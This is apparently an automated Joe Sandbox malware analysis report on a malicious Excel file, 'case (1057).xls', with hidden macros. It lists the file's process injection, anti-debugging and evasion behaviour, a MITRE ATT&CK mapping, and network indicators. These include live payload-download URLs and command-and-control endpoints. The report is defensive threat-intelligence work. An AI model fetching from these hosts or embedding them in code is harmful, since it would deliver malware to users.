Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_004569A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,

4_2_004569A0

Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Yzub\doa.dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\ProgramData\formnet.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\msiexec.exe TID: 2760

Thread sleep time: -300000s >= -30000s

Jump to behavior

Anti Debugging:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_0050A0CC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

4_2_0050A0CC

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_004569A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,

4_2_004569A0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_0044D830 LoadLibraryA,GetProcAddress,

4_2_0044D830

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00452EF0 mov eax, dword ptr fs:[00000030h]	4_2_00452EF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00520D28 mov eax, dword ptr fs:[00000030h]	4_2_00520D28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00520C5E mov eax, dword ptr fs:[00000030h]	4_2_00520C5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00520865 push dword ptr fs:[00000030h]	4_2_00520865
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000E2EF0 mov eax, dword ptr fs:[00000030h]	5_2_000E2EF0

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0050A0CC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		4_2_0050A0CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0050ABA4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		4_2_0050ABA4

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to inject code into remote processes

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_0044AE40 CreateProcessA,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,SetThreadContext,VirtualProtectEx,ResumeThread,ExitProcess,

4_2_0044AE40

Yara detected hidden Macro 4.0 in Excel

Show sources

Source: Yara match

File source: case (1057).xls, type: SAMPLE

Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe			Jump to behavior

Source: msiexec.exe, 00000005.00000002.2364330379.0000000001000000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: msiexec.exe, 00000005.00000002.2364330379.0000000001000000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: msiexec.exe, 00000005.00000002.2364330379.0000000001000000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_0050968A cpuid

4_2_0050968A

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetLocaleInfoA,

4_2_0050F6BB

Source: C:\Windows\SysWOW64\msiexec.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_005095A6 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

4_2_005095A6

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_00441A00 CreateDialogParamW,GetVersion,

4_2_00441A00

Source: C:\Windows\SysWOW64\msiexec.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting4	Path Interception	Access Token Manipulation1	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Process Injection112	Disable or Modify Tools1	LSASS Memory	Security Software Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution43	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion1	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Access Token Manipulation1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection112	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Scripting4	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information2	DCSync	System Information Discovery35	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Rundll321	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Software Packing2	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
4.2.rundll32.exe.440000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen2		Download File
5.2.msiexec.exe.d0000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen2		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)	0%	Avira URL Cloud	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://govemedico.tk/post.php.u	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
https://gadgetswolf.com/	0%	Avira URL Cloud	safe
https://rnollg.com/kev/scfrd.dll	0%	Avira URL Cloud	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
https://gadgetswolf.com/post.php	0%	Avira URL Cloud	safe
https://govemedico.tk/	0%	Avira URL Cloud	safe
https://homesoapmolds.com/post.php	0%	Avira URL Cloud	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
https://govemedico.tk/post.phpc	0%	Avira URL Cloud	safe
https://report-uri.clou	0%	Avira URL Cloud	safe
https://homesoapmolds.com/?p	0%	Avira URL Cloud	safe
https://govemedico.tk/_u	0%	Avira URL Cloud	safe
http://ocsp.digicer	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://crl4.digice	0%	Avira URL Cloud	safe
http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~	0%	Avira URL Cloud	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
https://rnollg.com/kev/scfrd.dll$8	0%	Avira URL Cloud	safe
https://homesoapmolds.com/	0%	Avira URL Cloud	safe
https://govemedico.tk/post.php	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
homesoapmolds.com	172.67.198.109	true	false	unknown
rnollg.com	172.67.150.228	true	false	unknown
gadgetswolf.com	104.21.44.135	true	false	unknown
govemedico.tk	104.21.73.69	true	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)	0DEE0000.0.dr	false	Avira URL Cloud: safe	unknown
http://www.windows.com/pctv.	rundll32.exe, 00000004.00000002.2169237640.0000000001EB0000.00000002.00000001.sdmp	false		high
http://investor.msn.com	rundll32.exe, 00000003.00000002.2169682622.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169237640.0000000001EB0000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000003.00000002.2169682622.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169237640.0000000001EB0000.00000002.00000001.sdmp	false		high
http://crl.entrust.net/server1.crl0	msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	false		high
http://ocsp.entrust.net03	msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://govemedico.tk/post.php.u	msiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://gadgetswolf.com/	msiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://rnollg.com/kev/scfrd.dll	before.1.0.0.sheet.csv_unpack	true	Avira URL Cloud: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://gadgetswolf.com/post.php	msiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://govemedico.tk/	msiexec.exe, 00000005.00000002.2364998565.0000000002DD0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://homesoapmolds.com/post.php	msiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000003.00000002.2169819479.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169401108.0000000002097000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	rundll32.exe, 00000003.00000002.2169682622.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169237640.0000000001EB0000.00000002.00000001.sdmp	false		high
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	rundll32.exe, 00000003.00000002.2169819479.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169401108.0000000002097000.00000002.00000001.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.icra.org/vocabulary/.	rundll32.exe, 00000003.00000002.2169819479.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169401108.0000000002097000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	msiexec.exe, 00000005.00000002.2363950897.0000000000970000.00000002.00000001.sdmp	false		high
https://govemedico.tk/post.phpc	msiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://report-uri.clou	msiexec.exe, 00000005.00000003.2180098839.0000000000606000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://investor.msn.com/	rundll32.exe, 00000003.00000002.2169682622.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169237640.0000000001EB0000.00000002.00000001.sdmp	false		high
https://homesoapmolds.com/?p	msiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://govemedico.tk/_u	msiexec.exe, 00000005.00000002.2364998565.0000000002DD0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.digicer	msiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.%s.comPA	msiexec.exe, 00000005.00000002.2363950897.0000000000970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://crl4.digice	msiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~	case (1057).xls	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://rnollg.com/kev/scfrd.dll$8	case (1057).xls, 0DEE0000.0.dr	false	Avira URL Cloud: safe	unknown
https://secure.comodo.com/CPS0	msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	false		high
https://homesoapmolds.com/	msiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	false		high
Https://homesoapmolds.com/post.php	msiexec.exe, 00000005.00000003.2180098839.0000000000606000.00000004.00000001.sdmp	false		unknown
https://govemedico.tk/post.php	msiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.150.228	unknown	United States	13335	CLOUDFLARENETUS	false
104.21.44.135	unknown	United States	13335	CLOUDFLARENETUS	false
104.21.73.69	unknown	United States	13335	CLOUDFLARENETUS	false
172.67.198.109	unknown	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	344667
Start date:	26.01.2021
Start time:	21:37:14
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	case (1057).xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.expl.evad.winXLS@7/12@4/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 67.6% (good quality ratio 67.3%) Quality average: 89.5% Quality standard deviation: 19.2%
HCA Information:	Successful, ratio: 83% Number of executed functions: 40 Number of non-executed functions: 28
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/344667/sample/case (1057).xls

Simulations

Behavior and APIs

Time	Type	Description
21:38:19	API Interceptor	1170x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
172.67.150.228	case (4335).xls	Get hash	malicious	Browse
	case (1522).xls	Get hash	malicious	Browse
	case (166).xls	Get hash	malicious	Browse
104.21.44.135	case (4374).xls	Get hash	malicious	Browse
104.21.44.135	case (166).xls	Get hash	malicious	Browse
104.21.73.69	case (4374).xls	Get hash	malicious	Browse
	case (4335).xls	Get hash	malicious	Browse
	case (1522).xls	Get hash	malicious	Browse
172.67.198.109	case (166).xls	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
rnollg.com	case (4335).xls	Get hash	malicious	Browse	172.67.150.228
	case (1522).xls	Get hash	malicious	Browse	172.67.150.228
	case (166).xls	Get hash	malicious	Browse	172.67.150.228
homesoapmolds.com	case (4374).xls	Get hash	malicious	Browse	104.21.60.169
	case (4335).xls	Get hash	malicious	Browse	104.21.60.169
	case (1522).xls	Get hash	malicious	Browse	104.21.60.169
	case (4374).xls	Get hash	malicious	Browse	104.21.60.169
	case (166).xls	Get hash	malicious	Browse	172.67.198.109
govemedico.tk	case (4374).xls	Get hash	malicious	Browse	104.21.73.69
	case (4335).xls	Get hash	malicious	Browse	104.21.73.69
	case (1522).xls	Get hash	malicious	Browse	104.21.73.69
	case (4374).xls	Get hash	malicious	Browse	172.67.158.184
	case (166).xls	Get hash	malicious	Browse	172.67.158.184
gadgetswolf.com	case (4374).xls	Get hash	malicious	Browse	172.67.200.147
	case (4335).xls	Get hash	malicious	Browse	172.67.200.147
	case (1522).xls	Get hash	malicious	Browse	172.67.200.147
	case (4374).xls	Get hash	malicious	Browse	104.21.44.135
	case (166).xls	Get hash	malicious	Browse	104.21.44.135

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	case (4374).xls	Get hash	malicious	Browse	104.21.73.69
	case (4335).xls	Get hash	malicious	Browse	104.21.73.69
	case (1522).xls	Get hash	malicious	Browse	104.21.73.69
	case (4374).xls	Get hash	malicious	Browse	104.21.60.169
	case (166).xls	Get hash	malicious	Browse	172.67.198.109
	PAYMENT.xlsx	Get hash	malicious	Browse	104.16.19.94
	PAYMENT.xlsx	Get hash	malicious	Browse	104.16.18.94
	Informacion.doc	Get hash	malicious	Browse	104.21.89.78
	PAYMENT.260121.xlsx	Get hash	malicious	Browse	162.159.133.233
	SecuriteInfo.com.Trojan.Packed2.42783.27799.exe	Get hash	malicious	Browse	104.21.19.200
	SecuriteInfo.com.Trojan.Packed2.42783.24703.exe	Get hash	malicious	Browse	104.21.19.200
	Ewqm21Iwdh.exe	Get hash	malicious	Browse	104.21.19.200
	a4iz7zkilq.exe	Get hash	malicious	Browse	104.21.19.200
	case (547).xls	Get hash	malicious	Browse	104.21.23.220
	Vcg9GH4CWw.exe	Get hash	malicious	Browse	104.21.19.200
	case (547).xls	Get hash	malicious	Browse	104.21.23.220
	nMn5eAMhBy.exe	Get hash	malicious	Browse	172.67.188.154
	sSPHg0Y2cZ.exe	Get hash	malicious	Browse	104.21.19.200
	vK6VPijMoq.exe	Get hash	malicious	Browse	104.21.19.200
	8gom3VEZLS.exe	Get hash	malicious	Browse	172.67.188.154
CLOUDFLARENETUS	case (4374).xls	Get hash	malicious	Browse	104.21.73.69
	case (4335).xls	Get hash	malicious	Browse	104.21.73.69
	case (1522).xls	Get hash	malicious	Browse	104.21.73.69
	case (4374).xls	Get hash	malicious	Browse	104.21.60.169
	case (166).xls	Get hash	malicious	Browse	172.67.198.109
	PAYMENT.xlsx	Get hash	malicious	Browse	104.16.19.94
	PAYMENT.xlsx	Get hash	malicious	Browse	104.16.18.94
	Informacion.doc	Get hash	malicious	Browse	104.21.89.78
	PAYMENT.260121.xlsx	Get hash	malicious	Browse	162.159.133.233
	SecuriteInfo.com.Trojan.Packed2.42783.27799.exe	Get hash	malicious	Browse	104.21.19.200
	SecuriteInfo.com.Trojan.Packed2.42783.24703.exe	Get hash	malicious	Browse	104.21.19.200
	Ewqm21Iwdh.exe	Get hash	malicious	Browse	104.21.19.200
	a4iz7zkilq.exe	Get hash	malicious	Browse	104.21.19.200
	case (547).xls	Get hash	malicious	Browse	104.21.23.220
	Vcg9GH4CWw.exe	Get hash	malicious	Browse	104.21.19.200
	case (547).xls	Get hash	malicious	Browse	104.21.23.220
	nMn5eAMhBy.exe	Get hash	malicious	Browse	172.67.188.154
	sSPHg0Y2cZ.exe	Get hash	malicious	Browse	104.21.19.200
	vK6VPijMoq.exe	Get hash	malicious	Browse	104.21.19.200
	8gom3VEZLS.exe	Get hash	malicious	Browse	172.67.188.154
CLOUDFLARENETUS	case (4374).xls	Get hash	malicious	Browse	104.21.73.69
	case (4335).xls	Get hash	malicious	Browse	104.21.73.69
	case (1522).xls	Get hash	malicious	Browse	104.21.73.69
	case (4374).xls	Get hash	malicious	Browse	104.21.60.169
	case (166).xls	Get hash	malicious	Browse	172.67.198.109
	PAYMENT.xlsx	Get hash	malicious	Browse	104.16.19.94
	PAYMENT.xlsx	Get hash	malicious	Browse	104.16.18.94
	Informacion.doc	Get hash	malicious	Browse	104.21.89.78
	PAYMENT.260121.xlsx	Get hash	malicious	Browse	162.159.133.233
	SecuriteInfo.com.Trojan.Packed2.42783.27799.exe	Get hash	malicious	Browse	104.21.19.200
	SecuriteInfo.com.Trojan.Packed2.42783.24703.exe	Get hash	malicious	Browse	104.21.19.200
	Ewqm21Iwdh.exe	Get hash	malicious	Browse	104.21.19.200
	a4iz7zkilq.exe	Get hash	malicious	Browse	104.21.19.200
	case (547).xls	Get hash	malicious	Browse	104.21.23.220
	Vcg9GH4CWw.exe	Get hash	malicious	Browse	104.21.19.200
	case (547).xls	Get hash	malicious	Browse	104.21.23.220
	nMn5eAMhBy.exe	Get hash	malicious	Browse	172.67.188.154
	sSPHg0Y2cZ.exe	Get hash	malicious	Browse	104.21.19.200
	vK6VPijMoq.exe	Get hash	malicious	Browse	104.21.19.200
	8gom3VEZLS.exe	Get hash	malicious	Browse	172.67.188.154

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	case (4335).xls	Get hash	malicious	Browse	172.67.150.228 104.21.73.69 104.21.44.135 172.67.198.109
	case (1522).xls	Get hash	malicious	Browse	172.67.150.228 104.21.73.69 104.21.44.135 172.67.198.109
	case (4374).xls	Get hash	malicious	Browse	172.67.150.228 104.21.73.69 104.21.44.135 172.67.198.109
	case (166).xls	Get hash	malicious	Browse	172.67.150.228 104.21.73.69 104.21.44.135 172.67.198.109
	PAYMENT.xlsx	Get hash	malicious	Browse	172.67.150.228 104.21.73.69 104.21.44.135 172.67.198.109
	case (547).xls	Get hash	malicious	Browse	172.67.150.228 104.21.73.69 104.21.44.135 172.67.198.109
	Dridex-06-bc1b.xlsm	Get hash	malicious	Browse	172.67.150.228 104.21.73.69 104.21.44.135 172.67.198.109
	The Mental Health Center.xlsx	Get hash	malicious	Browse	172.67.150.228 104.21.73.69 104.21.44.135 172.67.198.109
	Remittance Advice 117301.xlsx	Get hash	malicious	Browse	172.67.150.228 104.21.73.69 104.21.44.135 172.67.198.109
	SC-TR1167700000.xlsx	Get hash	malicious	Browse	172.67.150.228 104.21.73.69 104.21.44.135 172.67.198.109
	PAYMENT INFO.xlsx	Get hash	malicious	Browse	172.67.150.228 104.21.73.69 104.21.44.135 172.67.198.109
	case (348).xls	Get hash	malicious	Browse	172.67.150.228 104.21.73.69 104.21.44.135 172.67.198.109
	RefTreeAnalyserXL.xlam	Get hash	malicious	Browse	172.67.150.228 104.21.73.69 104.21.44.135 172.67.198.109
	case (426).xls	Get hash	malicious	Browse	172.67.150.228 104.21.73.69 104.21.44.135 172.67.198.109
